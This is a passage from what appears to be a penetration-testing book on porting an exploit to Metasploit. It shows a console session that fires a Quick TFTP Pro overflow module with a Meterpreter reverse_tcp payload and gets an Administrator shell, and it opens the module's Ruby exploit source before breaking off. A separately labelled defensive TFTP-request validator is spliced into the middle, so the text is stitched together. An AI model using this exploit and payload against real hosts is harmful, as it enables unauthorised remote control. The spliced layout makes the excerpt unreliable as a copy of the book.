Porting Exploits to the Metasploit Framework
Figure 15-6: Quick TFTP fully controlled
Next, we remove the dummy shellcode and run the module with a real
payload to get our shell, as shown here:
msf > use exploit/windows/tftp/quicktftp_book
msf exploit(quicktftp_book) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(quicktftp_book) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(quicktftp_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(quicktftp_book) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Trying target Windows XP SP2...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.155:1036)
meterpreter > getuid
Server username: V-XP-SP2-BARE\Administrator
Now that we have our Meterpreter shell, we’ve successfully ported an
exploit and used the Framework in an SEH exploit!
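Seen from the defending side, the module's name points at the weak spot: the mode field of a TFTP request. The following Ruby check is an added example, not code from the book or from Metasploit; it parses a read/write request using the RFC 1350 layout and rejects any mode other than netascii, octet, or mail. The function name, the filename limit, and the sample packets are assumptions constructed for illustration.

```ruby
# Added example: validate TFTP read/write requests (RFC 1350 layout) and
# reject the malformed mode field that a "long mode" overflow relies on.
VALID_MODES  = %w[netascii octet mail].freeze
MAX_FILENAME = 255 # assumed policy limit, not a value from the book

# Returns [:ok, info] or [:reject, reason] for one UDP payload.
def check_tftp_request(payload)
  data = payload.b
  return [:reject, 'too short for a TFTP header'] if data.bytesize < 4

  opcode = data.unpack1('n')
  # Only RRQ (1) and WRQ (2) carry a filename and a mode string.
  return [:ok, { opcode: opcode }] unless [1, 2].include?(opcode)

  # Layout after the opcode: filename NUL mode NUL [RFC 2347 options].
  # Limit -1 keeps the empty piece that follows the final NUL.
  fields = data.byteslice(2, data.bytesize).split("\x00".b, -1)
  return [:reject, 'missing NUL terminator'] if fields.length < 3

  filename = fields[0]
  mode     = fields[1]
  return [:reject, 'empty filename'] if filename.empty?
  if filename.bytesize > MAX_FILENAME
    return [:reject, "filename length #{filename.bytesize} exceeds #{MAX_FILENAME}"]
  end
  # Mode names are case-insensitive; anything else is refused, and the
  # length is reported so an oversized field stands out in logs.
  unless VALID_MODES.include?(mode.downcase)
    return [:reject, "invalid mode field (#{mode.bytesize} bytes)"]
  end

  [:ok, { opcode: opcode, filename: filename, mode: mode.downcase }]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample packets, not captured traffic.
  samples = {
    'normal read request' => [1].pack('n') + "test.txt\x00octet\x00",
    'oversized mode'      => [2].pack('n') + "a.txt\x00" + ('X' * 600) + "\x00",
    'unterminated mode'   => [1].pack('n') + "a.txt\x00octet"
  }
  samples.each do |label, pkt|
    verdict, detail = check_tftp_request(pkt)
    puts format('%-20s %-7s %s', label, verdict, detail)
  end
end
```
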
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
      'Description' => %q{
        This module exploits a stack overflow in Quick TFTP Pro 2.1.
      },